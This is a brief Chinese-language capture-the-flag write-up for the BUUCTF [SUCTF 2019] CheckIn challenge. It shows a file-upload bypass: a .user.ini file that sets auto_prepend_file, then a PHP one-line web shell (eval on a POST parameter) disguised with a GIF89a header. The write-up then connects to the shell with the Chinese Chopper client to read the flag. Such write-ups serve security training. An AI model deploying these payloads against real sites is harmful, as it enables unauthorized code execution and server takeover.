提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[SUCTF 2019]CheckIn 1
一、做题步骤
1.上传文件
1.上传.user.ini文件,这个文件必须在一句话木马前上传
GIF89a
auto_prepend_file=1.jpg
2.上传一句话木马
GIF89a
<script language ="php">
eval($_POST[1]);
</script>
2.菜刀连接
1.添加信息
http://53aeef0f-64de-4f9f-81ef-4c9667c6e6b2.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
因为看到当前目录下有个index.php文件,所以以此作为上传路径
2.获取flag
根目录下有flag文件
flag{dd4a4121-739f-4586-bbc1-be9b4ea3baf7}